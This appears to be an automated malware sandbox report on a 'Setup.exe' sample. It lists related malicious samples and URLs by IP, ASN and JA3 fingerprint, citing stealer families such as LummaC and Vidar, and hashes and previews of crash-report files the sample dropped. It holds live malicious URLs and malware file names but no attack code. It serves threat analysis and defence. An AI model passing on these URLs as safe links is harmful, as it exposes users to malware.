                                                                                                                                                                                                                                                    play.google.comhttp://tubnzy3uvz.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.217.19.238
                                                                                                                                                                                                                                                    http://poubnxu3jubz.top/1.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.217.19.238
                                                                                                                                                                                                                                                    http://poubnxu3jubz.top/1.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.217.19.238
                                                                                                                                                                                                                                                    iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    • 172.217.19.206
                                                                                                                                                                                                                                                    http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.217.19.238
                                                                                                                                                                                                                                                    https://specificallycries.com/askyhgxe?stixna=48&refer=https%3A%2F%2Fwww.bodyvitalspa.com%2F&kw=%5B%22welcome%22%2C%22to%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%2C%22-%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%5D&key=0b0f64ea0800e4174573a0e17513102f&scrWidth=1920&scrHeight=1080&tz=-5&v=24.12.6652&ship=&psid=www.bodyvitalspa.com,www.bodyvitalspa.com&sub3=invoke_layer&res=14.31&dev=r&adb=n&uuid=64597ca1-acf8-4c16-8774-db4c7f843adf%3A3%3A1&adb=nGet hashmaliciousAnonymous ProxyBrowse
                                                                                                                                                                                                                                                    • 172.217.19.206
                                                                                                                                                                                                                                                    5diately.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.217.19.206
                                                                                                                                                                                                                                                    fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                                    • 172.217.19.238
                                                                                                                                                                                                                                                    uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    • 172.217.19.206

                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    AKAMAI-ASUSVq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 23.57.90.162
                                                                                                                                                                                                                                                    grand-theft-auto-5-theme-1-installer_qb8W-j1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 95.100.135.104
                                                                                                                                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                    • 104.73.204.126
                                                                                                                                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                    • 104.120.124.62
                                                                                                                                                                                                                                                    pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    RUUSfr6dVm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    9idglWFv95.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                                    CLOUDFLARENETUShttp://proxyium.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.80.92
                                                                                                                                                                                                                                                    https://cbhc9.anguatiab.ru/RpweC/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.148.171
                                                                                                                                                                                                                                                    search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.153.170
                                                                                                                                                                                                                                                    http://bitstampweb.0532tg.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.133.12
                                                                                                                                                                                                                                                    https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.66.0.145
                                                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.152.152
                                                                                                                                                                                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    • 104.21.89.250
                                                                                                                                                                                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.208.58

                                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    search.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    TrdIE26br9.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    EB2UOXRNsE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    gshv2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    DOTA2#U89c6#U8ddd#U63d2#U4ef6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.2.114
                                                                                                                                                                                                                                                    • 104.121.10.34

                                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Setup.exe_All My_5fbe40f63b64d584b938a1eb405139b9fd77314b_7774cee5_5050b185-1b6e-45c5-a8fd-0a3cae9936b8\Report.wer

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                    Entropy (8bit):1.1718394771223088
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:TrBWw1hX0NXU6j3RV6+2zuiFPZ24IO8z:T9WYhkNXU6jp2zuiFPY4IO8z
                                                                                                                                                                                                                                                    MD5:DA7B66E9EBB14F207EC1D382F21BC90D
                                                                                                                                                                                                                                                    SHA1:E4B08855F20A564448F2F43F1D5CF7119455B89D
                                                                                                                                                                                                                                                    SHA-256:98D5E6CD17B402BAEE0136DB2CE81B96DE58BDE38085F14A1B89BCD94B68B8BF
                                                                                                                                                                                                                                                    SHA-512:BA889607C726C9AF97FB583636194554D32440AA740C782E2FFBF7609680811FC2A2E6A9A6EF4B73498216075A59AA7B9123976BB70E7A9D03FE6205ADE49AD9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.0.4.8.6.4.7.2.9.6.8.3.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.0.4.8.6.5.3.4.2.0.0.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.5.0.b.1.8.5.-.1.b.6.e.-.4.5.c.5.-.a.8.f.d.-.0.a.3.c.a.e.9.9.3.6.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.f.e.0.d.1.d.-.6.e.2.6.-.4.5.c.5.-.8.7.4.7.-.e.f.a.d.b.f.e.1.b.8.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.t.u.p...e.x.e._.A.l.l. .M.y. .B.o.o.k.s.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.c.0.-.0.0.0.1.-.0.0.1.4.-.8.2.6.5.-.f.d.b.b.9.d.5.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.1.e.1.3.4.0.6.e.6.7.e.6.e.7.a.b.2.f.7.a.0.6.c.0.8.e.a.c.c.7.f.0.0.

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Setup.exe_All My_a8c2553b49bfdb288d2c0942c3208ff4d1873e_7774cee5_0d1781e0-0bac-4fa5-977b-d44612574191\Report.wer

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                    Entropy (8bit):1.169740552928061
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:avj+Ww1ven0mCichbrj3RV6+2zuiF0Z24IO8z:xWYve0mAbrjp2zuiF0Y4IO8z
                                                                                                                                                                                                                                                    MD5:036561391465350DF48E5F19200F3EEE
                                                                                                                                                                                                                                                    SHA1:A45BE442E31B15F615DEBF0D2AA44CF361812ADA
                                                                                                                                                                                                                                                    SHA-256:E014477BED606C98B73529E2A4142206C292A00F20FCF08060898D90D72F7B56
                                                                                                                                                                                                                                                    SHA-512:B79CFA0E42ABD804F56D6B041B8C17C3109ABA52E4AD43E19D73A8AC3B067F20749FCB4D30BC77B102D0D0B215BA5AFF84F2F4F0AEB93D47FD5D0D15E8689AE7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.0.4.9.1.7.2.4.0.9.4.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.0.4.9.1.7.6.4.6.2.5.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.1.7.8.1.e.0.-.0.b.a.c.-.4.f.a.5.-.9.7.7.b.-.d.4.4.6.1.2.5.7.4.1.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.8.9.1.5.6.b.-.b.b.f.1.-.4.7.a.1.-.b.1.2.1.-.7.2.b.1.d.d.e.e.1.8.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.t.u.p...e.x.e._.A.l.l. .M.y. .B.o.o.k.s.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.c.0.-.0.0.0.1.-.0.0.1.4.-.8.2.6.5.-.f.d.b.b.9.d.5.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.1.e.1.3.4.0.6.e.6.7.e.6.e.7.a.b.2.f.7.a.0.6.c.0.8.e.a.c.c.7.f.0.0.

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AD6.tmp.dmp

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Fri Dec 27 20:28:37 2024, 0x1205a4 type
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):124054
                                                                                                                                                                                                                                                    Entropy (8bit):2.1029328078437644
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:k0nQeH89XxbjInyzopc5/uihty8eWr/bS7+lWqC:kgQEQd0nyUky8FLeKs
                                                                                                                                                                                                                                                    MD5:CF57899FE490499422C0109900D767A7
                                                                                                                                                                                                                                                    SHA1:A8E208FECCAC02EA82C83A9C9AA93DCF3A2A7EAD
                                                                                                                                                                                                                                                    SHA-256:E77BE5EF4E735EE4CCF54506204C657979C475C76BB07D70F69D9FB97C175614
                                                                                                                                                                                                                                                    SHA-512:F926BD9FD3053A2CECDD89A348EC82141A7B44B1829605E45C29A47F6C9E75929E6C0B072B4487A777A79F574F842256FFAD05CF12541C5A3C501EE20601550B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:MDMP..a..... .........og............D...........0"..X.......$....+...........[..........`.......8...........T...........8Z..^............+...........-..............................................................................eJ......0.......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B64.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8350
                                                                                                                                                                                                                                                    Entropy (8bit):3.702458423142935
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJeq6KE56Y9eSU9eB0gmf4443icXpDa89bEVsf8Mm:R6lXJL6n6Y0SU9Dgmf4449Eufu
                                                                                                                                                                                                                                                    MD5:BC1D081030EA1899D7D1E58F2B34477B
                                                                                                                                                                                                                                                    SHA1:640446FB341BFA1566D915A52FB5727736850615
                                                                                                                                                                                                                                                    SHA-256:D4051D4FDDD87BA0E2F889D019620A1D556E475EF7ABF8CA570F1B731E25DD02
                                                                                                                                                                                                                                                    SHA-512:3F18E74C0131D5C3C9FAB20418A9F45742F1979DD52F6805DF9DF662E2BF9D61C916200DB522EE65D06E7DACF91239D52272EA4B1FCC09A3E1C16225F1718E14
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.9.2.<./.P.i.

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BB3.tmp.xml

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4722
                                                                                                                                                                                                                                                    Entropy (8bit):4.457510207417577
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsEJg77aI9i1WpW8VYWYm8M4JeXK/FJ+q8IXrL7tQ1Ud:uIjfCI7cE7ViJeXgvXP+1Ud
                                                                                                                                                                                                                                                    MD5:C6D473971A5AD473A3BDEF1A5D1EB0F6
                                                                                                                                                                                                                                                    SHA1:E43154EE55F3303CCD9B1A72470926D6D9E41840
                                                                                                                                                                                                                                                    SHA-256:2752BD3E5134B4B60BD320D890D35B7B700E9511E917BDF7A28D372498C3DA33
                                                                                                                                                                                                                                                    SHA-512:51EDF72EA301D3479A1AFBCC2F2AD744D33C1E7C02635DD0AF30BDE99C5636CAA928A2C12DFE871376C399366BF6879E0F01E92E06FF7F6955FDF6B29AFCFDE6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650131" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DB2.tmp.dmp

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Fri Dec 27 20:27:45 2024, 0x1205a4 type
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):127782
                                                                                                                                                                                                                                                    Entropy (8bit):2.0835171154188172
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:KiKwBWxSQeHtaXaKxbjIAqg8HCdFpP5Z5Yg3hTcCr5mypNCQJjAg7J99RPeA0Ffo:pnQeH8X7xbjIngcc5/YMhTcIpLxwycLa
                                                                                                                                                                                                                                                    MD5:DF9A71C15538B1714DB1270200199D44
                                                                                                                                                                                                                                                    SHA1:90400CDF01DE0B1055F4BF396128F8E73F5096E7
                                                                                                                                                                                                                                                    SHA-256:2F25D40D11F25541FDC83FF74DAA13FDE184A816F2B17AB5283E478D4A84A713
                                                                                                                                                                                                                                                    SHA-512:69A4E0E1CE2FF9B470655A6FE77034A775F22EBA71D0110FD4EA41ED21A1A3F55C6337A002EF77243D77AFE967F98541B86F02ED2AEB97AB1B340D773D4C9112
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:MDMP..a..... .........og............D...........0"..X.......$....+...........[..........`.......8...........T............[..&............+...........-..............................................................................eJ......0.......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F4A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8376
                                                                                                                                                                                                                                                    Entropy (8bit):3.7029665753499055
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJeD6KoO66Y94SU99ZStcgmf93prt89bDiVsfrJQm:R6lXJi6x6YiSU9rStcgmf9gDiufFV
                                                                                                                                                                                                                                                    MD5:F9D5D6AB3F8E33815A802508266CD2B2
                                                                                                                                                                                                                                                    SHA1:E3F41D09EF30E5714D9352BE775D8CB229259078
                                                                                                                                                                                                                                                    SHA-256:4E28C7E056E691F99656A33D81ACA30233D653CFA7DA9E59774091AD428782F9
                                                                                                                                                                                                                                                    SHA-512:D07AFC0AF47833D213D1D1DFE2176040686836BF3AFC7018411D4F8577A123720E4C7A16CC3B75B42D857348BBA0C09890FB8112EBDF738AD6447FF86D6D6DE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.9.2.<./.P.i.

                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F79.tmp.xml

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4746
                                                                                                                                                                                                                                                    Entropy (8bit):4.4695199453614585
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsFNJg77aI9i1WpW8VYoYm8M4JeXKeFL+q8IXKj7tQ1Ud:uIjfFnI7cE7VgJeXjvXw+1Ud
                                                                                                                                                                                                                                                    MD5:53E23A476B1E23D134CB01230C93D325
                                                                                                                                                                                                                                                    SHA1:E76B01DC230637FBB96BA0C8C1E5C6B3DB804596
                                                                                                                                                                                                                                                    SHA-256:63F5348F695E2C874066BC10736800E01C2364D62E140E316419D3FCC1E7CC1E
                                                                                                                                                                                                                                                    SHA-512:A439B3622B93B4C86C38DC10F1507BA80A1E6FB139748F5E95D4C48F913E9C93A9CF8AA8674729598BC9B3B2283B2FFE157C22E81996E5A916CD07423B502768
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650130" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680660089[1].htm

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3188)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):35329
                                                                                                                                                                                                                                                    Entropy (8bit):5.378748057464046
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:ifBpqhYGM4evx83TfwtunNS3FPaXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9hJYY:KB8hYGM4evx83Tfwtun8PaXfsW9l+X9v
                                                                                                                                                                                                                                                    MD5:A490919BCCF25D2BED09C734C53FE02B
                                                                                                                                                                                                                                                    SHA1:D19FA7ADDCFBBEDD0CAE819FECB23F7C0DC79A76
                                                                                                                                                                                                                                                    SHA-256:22567A4A9670C5FADB8286251D16CE88DAF1DA1EE9BD05B1A06F595D7C4201E9
